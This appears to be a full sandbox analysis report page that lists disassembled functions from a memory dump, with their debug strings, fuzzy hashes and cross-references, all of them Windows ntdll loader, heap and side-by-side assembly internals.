                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                    • API String ID: 0-4009184096
                                                                    • Opcode ID: 29a7b41ebcb3876bcb01abc05852cfdd978774c11b81c9363db453d74a85e680
                                                                    • Instruction ID: 27a813c77eedc8cdfd135db12fbeea01c0e672d8173062f0fa7e3232181a14da
                                                                    • Opcode Fuzzy Hash: 29a7b41ebcb3876bcb01abc05852cfdd978774c11b81c9363db453d74a85e680
                                                                    • Instruction Fuzzy Hash: E9024FF1D042299BDB31DB54CC84BDEB7B8BB54704F4045DAA709AB241EB70AE84CF69
                                                                    Function 01628B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                    • API String ID: 0-2515994595
                                                                    • Opcode ID: 6008879c1b39735427dff3be88c54b6dd0771d5de74861cfaef2c179c5310aaf
                                                                    • Instruction ID: b5ae50a7c03901f94465102366e1e99f1a05b93f9de337dedec8fb808c1b9c38
                                                                    • Opcode Fuzzy Hash: 6008879c1b39735427dff3be88c54b6dd0771d5de74861cfaef2c179c5310aaf
                                                                    • Instruction Fuzzy Hash: 9951BF71604B229BC329DF188C44BABBBECFF98650F54491EE959CB241E770D608CF92
                                                                    Function 01630274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                    • API String ID: 0-1700792311
                                                                    • Opcode ID: 2e53c8155295c03df87643dde52af58e88c35d099c9a2c1854152d8798536e8c
                                                                    • Instruction ID: f1cfd8739d4576453024d73ef6c0117b29eee1dcfd507b1f41f128b2d77c285b
                                                                    • Opcode Fuzzy Hash: 2e53c8155295c03df87643dde52af58e88c35d099c9a2c1854152d8798536e8c
                                                                    • Instruction Fuzzy Hash: EDD1CB31600686EFDB26DF68DC41AAEBBF1FF8A710F188059F8459B352D7349989CB14
                                                                    Function 016089B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01608A3D
                                                                    • HandleTraces, xrefs: 01608C8F
                                                                    • VerifierDebug, xrefs: 01608CA5
                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01608A67
                                                                    • AVRF: -*- final list of providers -*- , xrefs: 01608B8F
                                                                    • VerifierDlls, xrefs: 01608CBD
                                                                    • VerifierFlags, xrefs: 01608C50
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                    • API String ID: 0-3223716464
                                                                    • Opcode ID: dfc6bca7a2c621f7329a54fb6ff4efbdd31c4a2ce69b7795ae8923692ffac97e
                                                                    • Instruction ID: 5d337fd264821f0574764546300116dccc99f9b775d04305d2a6cabb1ba259c9
                                                                    • Opcode Fuzzy Hash: dfc6bca7a2c621f7329a54fb6ff4efbdd31c4a2ce69b7795ae8923692ffac97e
                                                                    • Instruction Fuzzy Hash: 4C912272A40B12AFD72BEF288C80B1B7BA9FB94714F054598FA466F2C1D7709C01CB95
                                                                    Function 0158EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                    • API String ID: 0-1109411897
                                                                    • Opcode ID: 7b303595e4c53ce20bb4bf7e64557abcaefb01d4b315b50f9a086628b460c1f6
                                                                    • Instruction ID: 21bc385e6709741667bb6952d69b9fd13d806f3fe6f8414c1777c7a042877efb
                                                                    • Opcode Fuzzy Hash: 7b303595e4c53ce20bb4bf7e64557abcaefb01d4b315b50f9a086628b460c1f6
                                                                    • Instruction Fuzzy Hash: 60A21974E0562A8FDB68DF19C8887ADBBF5BF49304F1442EAD509AB250DB309E85CF40
                                                                    Function 015B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-792281065
                                                                    • Opcode ID: 23de61da0690b262295c3338757c6d504651ca2d3632d2c2c55ddd7b41222b4d
                                                                    • Instruction ID: b14de06fd2d169a9552dfe8b665d08609ec84898ba1cbc07ac847544d18065bc
                                                                    • Opcode Fuzzy Hash: 23de61da0690b262295c3338757c6d504651ca2d3632d2c2c55ddd7b41222b4d
                                                                    • Instruction Fuzzy Hash: 75912371B017169BEB39DF58DC85BAF7BA5FB80B24F04012DEA016F281D7B89841CB95
                                                                    Function 0157645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpInitShimEngine, xrefs: 015D99F4, 015D9A07, 015D9A30
                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015D9A2A
                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015D99ED
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015D9A11, 015D9A3A
                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015D9A01
                                                                    • apphelp.dll, xrefs: 01576496
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-204845295
                                                                    • Opcode ID: 00506037691b9ba21cf6732bd189e5de36c5447adfad805d7d22cd82c5795172
                                                                    • Instruction ID: bdd32a19e43104b2eccf6ae6ea56aaab40f116ec124ed069d7b4b96d5bfc9ee0
                                                                    • Opcode Fuzzy Hash: 00506037691b9ba21cf6732bd189e5de36c5447adfad805d7d22cd82c5795172
                                                                    • Instruction Fuzzy Hash: BD51C3712187029FE724DF28DC56AABB7E8FB84644F40091DF5859F150D7B0E944CB93
                                                                    Function 015B2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015F2178
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015F2180
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015F21BF
                                                                    • SXS: %s() passed the empty activation context, xrefs: 015F2165
                                                                    • RtlGetAssemblyStorageRoot, xrefs: 015F2160, 015F219A, 015F21BA
                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015F219F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                    • API String ID: 0-861424205
                                                                    • Opcode ID: e3ea6007fb248c248c7cea902b02912aef577b22a0b238df65454ee982e2c35f
                                                                    • Instruction ID: d40650be4d337c989a4f16268e300f08950e3de2044e89cec124ada74d818792
                                                                    • Opcode Fuzzy Hash: e3ea6007fb248c248c7cea902b02912aef577b22a0b238df65454ee982e2c35f
                                                                    • Instruction Fuzzy Hash: 6F313576B4021177E7218A998C81F9F7AA9FBA5A40F05405DBB04AF140D670EE01C6F4
                                                                    Function 015BC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Loading import redirection DLL: '%wZ', xrefs: 015F8170
                                                                    • LdrpInitializeImportRedirection, xrefs: 015F8177, 015F81EB
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015BC6C3
                                                                    • LdrpInitializeProcess, xrefs: 015BC6C4
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 015F8181, 015F81F5
                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 015F81E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-475462383
                                                                    • Opcode ID: 526411180d8350ccf2e62d8c71974ccad879d2d5c83bf1542a1b4a3ee39134b0
                                                                    • Instruction ID: 2da031bdc41eb259af773c52a1d40499bb1b6f0b3cfa59f864c95106a4d3ff06
                                                                    • Opcode Fuzzy Hash: 526411180d8350ccf2e62d8c71974ccad879d2d5c83bf1542a1b4a3ee39134b0
                                                                    • Instruction Fuzzy Hash: 6931DF716447139BD324EE28DD86E2AB7D4FFD4B10F04065CF985AF291E660EC04CBA2
                                                                    Function 015C096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 015C2DF0: LdrInitializeThunk.NTDLL ref: 015C2DFA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015C0BA3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015C0BB6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015C0D60
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015C0D74
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 1404860816-0
                                                                    • Opcode ID: 5ad237f06a9144edabf6560056f67a912c68cbd63e607e7e73210c9a09da8a27
                                                                    • Instruction ID: 265415941fa961bc716ccb2e4825bd6b35b9bc882f0b09e20748221c27bf0a2a
                                                                    • Opcode Fuzzy Hash: 5ad237f06a9144edabf6560056f67a912c68cbd63e607e7e73210c9a09da8a27
                                                                    • Instruction Fuzzy Hash: 9D425A75900716DFDB21CF68C880BAAB7F4BF44714F1445ADEA89EB241E770AA84CF61
                                                                    Function 0158A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    • API String ID: 0-379654539
                                                                    • Opcode ID: 69c8682034c51f70b932cc041c665be44b3ad48e911dc551b8600406c2b51f43
                                                                    • Instruction ID: b97d68a9e9ee85fef9bf446936d71613a4b5936401f1bf1b7cdd6065006fad5e
                                                                    • Opcode Fuzzy Hash: 69c8682034c51f70b932cc041c665be44b3ad48e911dc551b8600406c2b51f43
                                                                    • Instruction Fuzzy Hash: 1BC19B70508382CFDB25EF58C044B6AB7E4FF84704F04486AF995AF265E778CA49CB62
                                                                    Function 015B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • @, xrefs: 015B8591
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015B8421
                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015B855E
                                                                    • LdrpInitializeProcess, xrefs: 015B8422
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1918872054
                                                                    • Opcode ID: f452e1751d7ca1473ea4091ad170c7f43a78f589980b3ff123f6d0c07b467d21
                                                                    • Instruction ID: 40d95ded32b30e2edd4e773f914eb953cef5b8a27351a9b52da40a11f77216da
                                                                    • Opcode Fuzzy Hash: f452e1751d7ca1473ea4091ad170c7f43a78f589980b3ff123f6d0c07b467d21
                                                                    • Instruction Fuzzy Hash: 76919B71518746AFD721DE65CC80FAFBAECBF84748F40092EFA849A151E734D944CB62
                                                                    Function 015B273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015F22B6
                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015F21D9, 015F22B1
                                                                    • SXS: %s() passed the empty activation context, xrefs: 015F21DE
                                                                    • .Local, xrefs: 015B28D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                    • API String ID: 0-1239276146
                                                                    • Opcode ID: 3f6d5e222665603373279812ab906398e21d0392d413279013d95d195b5d5797
                                                                    • Instruction ID: bb926fb71260d344c8798a8f6b2f84d171818440b84047c95e52076d69829c40
                                                                    • Opcode Fuzzy Hash: 3f6d5e222665603373279812ab906398e21d0392d413279013d95d195b5d5797
                                                                    • Instruction Fuzzy Hash: 7CA1AE3590022A9BDB25CF68C8C4BE9B7B5BF58354F1445EAD908AF251D730AEC1CFA0
                                                                    Function 015B4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015F342A
                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015F3437
                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015F3456
                                                                    • RtlDeactivateActivationContext, xrefs: 015F3425, 015F3432, 015F3451
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                    • API String ID: 0-1245972979
                                                                    • Opcode ID: f5a3977616bd2d4392d84d52a02df7ed580ac16ac82a8ab283d77fe4f62c1eca
                                                                    • Instruction ID: 77d8a34c772d0d38ef3042bf907d24fa9e0ceac0adf5155a6a384783bc67171f
                                                                    • Opcode Fuzzy Hash: f5a3977616bd2d4392d84d52a02df7ed580ac16ac82a8ab283d77fe4f62c1eca
                                                                    • Instruction Fuzzy Hash: 2A6106366507129BEB32CF1DC889B6AB7E5FF90B50F14852DEA569F281D730E801CB91
                                                                    Function 015864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015E106B
                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015E10AE
                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015E0FE5
                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015E1028
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                    • API String ID: 0-1468400865
                                                                    • Opcode ID: a0d6a24fdb2a89426c7d09da3e5e9a574317ae8a0be15548511ba299910eca9a
                                                                    • Instruction ID: 06534215d5fb1a9f2b8129eb01b874f908784a5ac1dfa1105419b90c33c0e2a9
                                                                    • Opcode Fuzzy Hash: a0d6a24fdb2a89426c7d09da3e5e9a574317ae8a0be15548511ba299910eca9a
                                                                    • Instruction Fuzzy Hash: 8071CFB19043069FDB21EF58C885B9B7BA8BF94764F400468F9489F286D734D588CBE2
                                                                    Function 015A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015EA992
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015EA9A2
                                                                    • LdrpDynamicShimModule, xrefs: 015EA998
                                                                    • apphelp.dll, xrefs: 015A2462
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-176724104
                                                                    • Opcode ID: 583aba27ebfaf3ed4b1fd721c84f55ed17bcb529dbc4bcb067385706d8c08eca
                                                                    • Instruction ID: 10a6fbc0dd995c36a87b70f22ab31488cd9335e35c9a23a1c6822c9e81ae7884
                                                                    • Opcode Fuzzy Hash: 583aba27ebfaf3ed4b1fd721c84f55ed17bcb529dbc4bcb067385706d8c08eca
                                                                    • Instruction Fuzzy Hash: 75312875A40202EBEB399F6DDC49AAEBBF5FB84710F16001DE901AF245C7B05851CB90
                                                                    Function 015929A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 01593255
                                                                    • HEAP: , xrefs: 01593264
                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0159327D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                    • API String ID: 0-617086771
                                                                    • Opcode ID: eb4b31b2c2bb95d7f6e0461a91d6da1df5e11996b7ce3e41ea6ca8c52818d0ff
                                                                    • Instruction ID: 37af1efade404b19b784d40bcd1bd519b70981bb5b2bdf3f17767de118f135eb
                                                                    • Opcode Fuzzy Hash: eb4b31b2c2bb95d7f6e0461a91d6da1df5e11996b7ce3e41ea6ca8c52818d0ff
                                                                    • Instruction Fuzzy Hash: B1929971A04249EFEF25CFA8C444BAEBBF1FF48300F188499E85AAF251D735A945CB51
                                                                    Function 01590770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-4253913091
                                                                    • Opcode ID: 9979b355ecad8fee5cd736c3177b02454e13b74b094f74fe30c54cb04430e82a
                                                                    • Instruction ID: 83aa136c4560dfea4d59dd1d3a21d63ca31715194707eff001fd468c3a8aac53
                                                                    • Opcode Fuzzy Hash: 9979b355ecad8fee5cd736c3177b02454e13b74b094f74fe30c54cb04430e82a
                                                                    • Instruction Fuzzy Hash: 7DF19B34A00606DFEB19CF68C894B6EB7FAFB44304F148969E5569F381D734E981CB92
                                                                    Function 015A6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $@
                                                                    • API String ID: 0-1077428164
                                                                    • Opcode ID: 005dca4fe6c7ceb8cf8febf0ff2495811b7679fc9f71777985791d2640f181e5
                                                                    • Instruction ID: 3460f399bc7293f68b65f05bc192705dbace9c96ec9194bfab999a42a7f79668
                                                                    • Opcode Fuzzy Hash: 005dca4fe6c7ceb8cf8febf0ff2495811b7679fc9f71777985791d2640f181e5
                                                                    • Instruction Fuzzy Hash: 3BC26E71A483419FEB25CF28C881BAFBBE5BFC8754F44892DE9898B241D735D805CB52
                                                                    Function 0157A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                    • API String ID: 0-2779062949
                                                                    • Opcode ID: 563f776aac47e762ee7ca3bfa3c4d94032d65fde977bfbd34b9c174ed081159a
                                                                    • Instruction ID: dd1260696d63a2ae944792d1ba6a17206beb3431a55903b590465ad1f8a28a70
                                                                    • Opcode Fuzzy Hash: 563f776aac47e762ee7ca3bfa3c4d94032d65fde977bfbd34b9c174ed081159a
                                                                    • Instruction Fuzzy Hash: A6A16E719116299BDB31DF68CC88BADB7B8FF44710F1001E9D909AB250EB359E84CF50
                                                                    Function 015A0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpCheckModule, xrefs: 015EA117
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015EA121
                                                                    • Failed to allocated memory for shimmed module list, xrefs: 015EA10F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-161242083
                                                                    • Opcode ID: 99625c361e92b5a2d39f9a3272789e18aa16c2c305d5a55b9c35656de932ca2a
                                                                    • Instruction ID: 339f7f33accedc47e7244067bfba99b96adcdbd93ae738eecd06bc03eed5a5b6
                                                                    • Opcode Fuzzy Hash: 99625c361e92b5a2d39f9a3272789e18aa16c2c305d5a55b9c35656de932ca2a
                                                                    • Instruction Fuzzy Hash: 3971DC71E40206DFEB29EF68CD95ABEB7F4FB84604F54446DE802AF291E734A941CB50
                                                                    Function 01590A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
